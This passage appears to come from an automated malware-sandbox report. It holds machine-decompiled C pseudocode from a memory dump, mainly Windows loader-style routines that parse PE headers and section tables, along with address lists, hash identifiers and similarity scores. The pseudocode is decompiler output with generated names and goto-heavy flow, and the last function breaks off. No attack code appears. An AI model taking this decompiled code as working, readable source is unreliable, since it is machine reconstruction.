																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L0302EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E03059730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E0302E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L03028F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03053C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0302d5f2
0x0302d5f5
0x0302d5f5
0x0302d5fd
0x0302d600
0x0302d60a
0x0302d60d
0x0302d617
0x0302d61d
0x0302d627
0x0302d62e
0x0302d911
0x0302d913
0x00000000
0x0302d919
0x0302d919
0x0302d919
0x0302d634
0x0302d634
0x0302d634
0x0302d634
0x0302d640
0x0302d8bf
0x00000000
0x0302d646
0x0302d646
0x0302d64d
0x0302d652
0x0307b2fc
0x0307b2fc
0x0307b302
0x0307b33b
0x0307b341
0x00000000
0x0307b304
0x0307b304
0x0307b319
0x0307b31e
0x0307b324
0x0307b326
0x0307b332
0x0307b347
0x0307b34c
0x0307b351
0x0307b35a
0x00000000
0x0307b328
0x0307b328
0x00000000
0x0307b328
0x0307b326
0x0302d658
0x0302d658
0x0302d65b
0x0302d665
0x00000000
0x0302d66b
0x0302d66b
0x0302d66b
0x0302d66b
0x0302d66d
0x0302d672
0x0302d67a
0x00000000
0x00000000
0x0302d680
0x0302d686
0x0302d8ce
0x0302d8d4
0x0302d8dd
0x0302d8e0
0x0302d68c
0x0302d691
0x0302d69d
0x0302d6a2
0x0302d6a7
0x0302d6b0
0x0302d6b5
0x0302d6e0
0x0302d6b7
0x0302d6b7
0x0302d6b9
0x0302d6b9
0x0302d6bb
0x0302d6bd
0x0302d6ce
0x0302d6d0
0x0302d6d2
0x0307b363
0x0307b365
0x00000000
0x0307b36b
0x00000000
0x0307b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0302d6bf
0x0302d6bf
0x0302d6e5
0x0302d6e7
0x0302d6e9
0x0302d6ec
0x0302d6ec
0x0302d6ef
0x0302d6f5
0x0302d6f9
0x0302d6fb
0x0302d6fd
0x0302d701
0x0302d703
0x0302d70a
0x0302d70a
0x0302d701
0x0302d710
0x0302d710
0x0302d6c1
0x0302d6c1
0x0302d6c6
0x0307b36d
0x0307b36f
0x00000000
0x0307b375
0x0307b375
0x0307b375
0x00000000
0x0307b375
0x00000000
0x0302d6cc
0x0302d6d8
0x0302d6d8
0x0302d6d8
0x00000000
0x0302d6c6
0x0302d6bf
0x00000000
0x0302d6da
0x0302d6da
0x0302d716
0x0302d71b
0x0302d720
0x0302d726
0x0302d726
0x0302d72d
0x00000000
0x0302d733
0x0302d739
0x0302d742
0x0302d750
0x0302d758
0x0302d764
0x0302d776
0x0302d77a
0x0302d783
0x0302d928
0x0302d92c
0x0302d93d
0x0302d944
0x0302d94f
0x0302d954
0x0302d956
0x0302d95f
0x0302d961
0x0302d973
0x0302d973
0x0302d956
0x0302d944
0x0302d92c
0x0302d78b
0x0307b394
0x0302d791
0x0302d798
0x0307b3a3
0x0307b3bb
0x0307b3bb
0x0302d7a5
0x0302d866
0x0302d870
0x0302d892
0x0302d898
0x0302d89e
0x0302d8a0
0x0302d8a6
0x0302d8ac
0x0302d8ae
0x0302d8b4
0x0302d8b4
0x0302d8ae
0x0302d7a5
0x0302d78b
0x0302d7b1
0x0307b3c5
0x0307b3c5
0x0302d7c3
0x0302d7ca
0x0302d7e5
0x0302d7eb
0x0302d8eb
0x0302d8ed
0x00000000
0x0302d8f3
0x0302d8f3
0x0302d8f3
0x00000000
0x0302d8ed
0x0302d7cc
0x0302d7cc
0x0302d7d2
0x00000000
0x0302d7d4
0x0302d7d4
0x0302d7d7
0x0302d7df
0x0307b3d4
0x0307b3d9
0x0307b3dc
0x0307b3dc
0x0307b3df
0x0307b3e2
0x0307b468
0x0307b46d
0x0307b46f
0x0307b46f
0x0307b475
0x0302d8f8
0x0302d8f9
0x0302d8fd
0x0307b3e8
0x0307b3e8
0x0307b3eb
0x0307b3ed
0x00000000
0x0307b3ef
0x0307b3ef
0x0307b3f1
0x0307b3f4
0x0307b3fe
0x0307b404
0x0307b409
0x0307b40e
0x0307b410
0x0307b410
0x0307b414
0x0307b414
0x0307b41b
0x0307b420
0x0307b423
0x0307b425
0x0307b427
0x0307b42a
0x0307b42d
0x0307b42d
0x0307b42a
0x0307b432
0x0307b436
0x0307b438
0x0307b43b
0x0307b43b
0x0307b449
0x0307b44e
0x0307b454
0x0307b458
0x0307b458
0x0307b45d
0x00000000
0x0307b45d
0x0307b3ed
0x00000000
0x00000000
0x00000000
0x0302d7df
0x0302d7d2
0x0302d7ca
0x0307b37c
0x0307b37e
0x0307b385
0x0307b38a
0x00000000
0x0307b38a
0x0302d742
0x0302d7f1
0x0302d7f8
0x0307b49b
0x0307b49b
0x0302d800
0x0302d837
0x0302d843
0x0302d845
0x0302d847
0x0302d84a
0x0302d84b
0x0302d84e
0x0302d857
0x0302d818
0x0302d824
0x0302d831
0x0307b4a5
0x0307b4ab
0x0307b4b3
0x0307b4b8
0x0307b4bb
0x00000000
0x0307b4c1
0x0307b4c1
0x0307b4c8
0x00000000
0x0307b4ce
0x0307b4d4
0x0307b4e1
0x0307b4e3
0x0307b4e5
0x00000000
0x0307b4eb
0x0307b4f0
0x0307b4f2
0x0302dac9
0x0302dacc
0x0302dacf
0x0302dad1
0x0302dd78
0x0302dd78
0x0302dcf2
0x00000000
0x0302dad7
0x0302dad9
0x0302dadb
0x00000000
0x00000000
0x0302dae1
0x0302dae1
0x0302dae4
0x0302dae6
0x0307b4f9
0x0307b4f9
0x0307b500
0x0302daec
0x0302daec
0x0302daf5
0x0302daf8
0x0302dafb
0x0302db03
0x0302db11
0x0302db16
0x0302db19
0x0302db1b
0x0307b52c
0x0307b531
0x0307b534
0x0302db21
0x0302db21
0x0302db24
0x0302dcd9
0x0302dce2
0x0302dce5
0x0302dd6a
0x0302dd6d
0x00000000
0x0302dd73
0x0307b51a
0x0307b51c
0x0307b51f
0x0307b524
0x00000000
0x0307b524
0x0302dce7
0x0302dce7
0x0302dce7
0x00000000
0x0302dce7
0x00000000
0x0302db2a
0x0302db2c
0x0302db31
0x0302db33
0x0302db36
0x0302db39
0x0302db3b
0x0302db66
0x0302db66
0x0302db3d
0x0302db3d
0x0302db3e
0x0302db46
0x0302db47
0x0302db49
0x0302db4c
0x0302db53
0x0302db55
0x0302db58
0x0302db5a
0x0307b50a
0x0307b50f
0x0307b512
0x0302db60
0x0302db60
0x0302db63
0x0302db63
0x00000000
0x0302db63
0x0302db5a
0x0302db3b
0x0302db24
0x0302db69
0x0302db69
0x0302db6c
0x0302db6f
0x0302db74
0x0307b557
0x0307b557
0x0307b55e
0x0302db7a
0x0302db7c
0x0302db7f
0x0302db82
0x0302db85
0x00000000
0x0302db8b
0x0302db8b
0x0302db8d
0x0302db9b
0x0302db9b
0x0302db9d
0x0302dba0
0x0302dba2
0x0302dba4
0x0302dba7
0x0302dba9
0x0302dbae
0x0302dbae
0x0302dbb1
0x0302dbb4
0x0302dbb4
0x0302dbb7
0x0302dbba
0x0302dcd2
0x0302dcd4
0x00000000
0x0302dbc0
0x0302dbc0
0x0302dbd2
0x0302dbd7
0x0302dbda
0x0302dbdd
0x0302dbdf
0x00000000
0x0302dbe5
0x0302dbe5
0x0302dbee
0x0302dbf1
0x0307b541
0x0307b544
0x00000000
0x0307b546
0x0307b546
0x00000000
0x0307b546
0x0302dbf7
0x0302dbf7
0x0302dbfd
0x0302dbfd
0x0302dbff
0x0302dc0b
0x0302dc15
0x0302dc1b
0x0302dc1d
0x0302dc21
0x0302dc21
0x0302dc23
0x0302dc23
0x0302dc26
0x0302dc29
0x0302dc2b
0x00000000
0x00000000
0x0302dc31
0x0302dc34
0x0302dc36
0x0302dcbf
0x0302dcbf
0x0302dcc2
0x00000000
0x0302dc3c
0x0302dc41
0x0302dc43
0x00000000
0x0302dc45
0x0302dc45
0x0302dc47
0x00000000
0x0302dc4d
0x0302dc4d
0x0302dc50
0x0302dc52
0x0302dc55
0x0302dcfa
0x0302dcfe
0x0302dd08
0x0302dd0a
0x0302dd0c
0x00000000
0x0302dd12
0x0302dd15
0x0302dd2d
0x0302dd2f
0x0302dd32
0x0302dd35
0x00000000
0x0302dd35
0x0302dc5b
0x0302dc5b
0x0302dc5e
0x0302dc61
0x0302dc64
0x0302dc67
0x0302dc67
0x0302dc6a
0x0302dc6c
0x0302dc8e
0x0302dc8e
0x0302dc91
0x0302dc93
0x0302dcce
0x0302dcce
0x0302dc95
0x0302dc9c
0x0302dc6e
0x0302dc72
0x0302dc75
0x0302dc77
0x0302dc79
0x0307b551
0x0307b551
0x00000000
0x0302dc7f
0x0302dc7f
0x0302dc81
0x00000000
0x0302dc83
0x0302dc86
0x0302dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0302dc88
0x0302dc81
0x0302dc79
0x0302dc6c
0x0302dc55
0x0302dc47
0x0302dc43
0x00000000
0x0302dc36
0x0302dc23
0x00000000
0x0302dbff
0x0302dbf1
0x0302dbdf
0x0302db8f
0x0302db92
0x0302db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0302db95
0x0302db8d
0x0302db85
0x0302db74
0x0302dc9f
0x0302dca2
0x0302dcb0
0x0302dcb0
0x0302dad1
0x0307b4e5
0x0307b4c8
0x00000000
0x00000000
0x00000000
0x0302d831
0x00000000
0x0302d800
0x0307b47f
0x0307b485
0x00000000
0x0307b485
0x0302d665
0x0302d652
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72cd0cd425c83f0bb9421c8ba04add3528516dc21a708a500cc545470207d6ec
Instruction ID: 5f33e8bba190d310266ed77447f7513757b5c5614ac7a5ce2446113730c14951
Opcode Fuzzy Hash: 72cd0cd425c83f0bb9421c8ba04add3528516dc21a708a500cc545470207d6ec
Instruction Fuzzy Hash: 3CE1C134A06769CFDB64DF24C884BAEBBF6BF85304F0841E9D8199B290D774AD81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0302849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0302849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x30ef9c0);
				E0306D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x3107b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0302CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E03032280( *[fs:0x30], 0x3108550);
						_t139 =  *0x3107b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0304F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0302FFB0(_t193, _t235, 0x3108550);
								L5:
								return E0306D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E03011C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x3107b9c; // 0x0
							_t235 = L03034620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x3107b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0304A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0302FFB0(_t193, _t235, 0x3108550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L030377F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L030377F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x3107b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x3107b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E030537C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x3107b9c; // 0x0
									_t214 = L03034620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E030537F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x3107b10 =  *0x3107b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x3107b04 =  *0x3107b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L030377F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L030377F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x3107b08 =  *0x3107b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E030557C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0305F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L030377F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0304A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L030377F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E030596C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x0302849b
0x0302849b
0x0302849b
0x0302849b
0x0302849d
0x030284a2
0x030284a7
0x030284b1
0x030284d8
0x00000000
0x030284b3
0x030284c4
0x030284c9
0x030284cd
0x030284cf
0x030284cf
0x030284d6
0x030284e6
0x030284e9
0x030284ec
0x030284ef
0x030284f2
0x030284f4
0x030284fc
0x03028501
0x03028506
0x03028509
0x030286e0
0x030286e5
0x030286e8
0x030286ed
0x030286f0
0x030286f2
0x03079afd
0x03079b02
0x030284da
0x030284df
0x030284df
0x030286fa
0x030286fd
0x030286fe
0x03028701
0x03028706
0x03028709
0x0302870b
0x00000000
0x00000000
0x03028711
0x03028725
0x03028727
0x0302872a
0x0302872c
0x03079af0
0x03079af5
0x03028732
0x03028732
0x03028732
0x03028735
0x03028737
0x03028515
0x03028515
0x03028518
0x0302851d
0x03028523
0x03028527
0x0302852b
0x03028537
0x03028539
0x0302853c
0x0302853e
0x0302868c
0x03028691
0x03028699
0x0302869b
0x03028744
0x03028748
0x030286a1
0x030286a1
0x030286a1
0x030286a4
0x030286a8
0x03079bdf
0x03079bdf
0x030286ae
0x030286b0
0x00000000
0x030286b6
0x00000000
0x03079be9
0x030286b0
0x03028544
0x0302854a
0x0302854d
0x03028551
0x0302876e
0x03028778
0x0302877b
0x03028780
0x03028557
0x03028557
0x0302855d
0x0302855d
0x0302856b
0x0302856e
0x03028570
0x03028573
0x03028576
0x03028576
0x03028579
0x0302857b
0x00000000
0x00000000
0x03028581
0x030285a0
0x030285a2
0x030285a5
0x030285a7
0x03079b1b
0x03079b1b
0x0302862e
0x0302862e
0x03028631
0x03028631
0x03028634
0x03028636
0x03028669
0x03028669
0x0302866b
0x03079bbf
0x03079bc4
0x03079bc8
0x03079bce
0x03079bce
0x03028671
0x03028671
0x03028674
0x03028676
0x03079bae
0x03079bae
0x03028676
0x0302867c
0x0302867e
0x03028688
0x03028688
0x00000000
0x0302867e
0x03028638
0x03028638
0x0302863b
0x0302863e
0x0302863f
0x03028642
0x03028645
0x03028648
0x0302864d
0x03079b69
0x03079b6e
0x03079b7b
0x03079b81
0x03079b85
0x03079b89
0x03079ba7
0x03079b8b
0x03079b91
0x03079b9a
0x03079b9f
0x03079b9f
0x03028788
0x0302878d
0x03028763
0x03028763
0x03028766
0x00000000
0x03028766
0x03079b70
0x00000000
0x03079b70
0x03028656
0x0302865a
0x0302865c
0x03028752
0x03028756
0x00000000
0x00000000
0x0302875e
0x00000000
0x0302875e
0x03028662
0x03028662
0x03028662
0x03028666
0x00000000
0x03028666
0x030285b7
0x030285b9
0x030285bc
0x030285bf
0x030285cc
0x030285d1
0x030285d4
0x030285db
0x030285de
0x030285e0
0x03079b5f
0x00000000
0x03079b5f
0x030285e6
0x030285ea
0x030286c3
0x030286c5
0x030286c8
0x030286ca
0x03079b16
0x00000000
0x03079b16
0x030286d6
0x030285f6
0x030285f6
0x030285f9
0x03028602
0x03028606
0x0302860a
0x0302860b
0x0302860e
0x03028611
0x00000000
0x03028611
0x030285f3
0x00000000
0x030285f3
0x03028619
0x0302861e
0x0302861e
0x03028621
0x03028622
0x03028623
0x03028625
0x0302862c
0x00000000
0x0302873d
0x00000000
0x0302873d
0x03028737
0x0302850f
0x03028512
0x00000000
0x03028512
0x00000000
0x030284d6

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e571f81d62d9141d17414d41acc7176af6972ac73d9bd615e1540c49ff3144
Instruction ID: 1adf6872ef24759ef7c7f4407c3e5fdbc6be5634afab16757cb6867c60c61eae
Opcode Fuzzy Hash: 15e571f81d62d9141d17414d41acc7176af6972ac73d9bd615e1540c49ff3144
Instruction Fuzzy Hash: 41B15E78E02329DFDB14DFD9C984AAEFBB9FF88304F148529E405AB245D770A941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0304513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0304513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x310d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
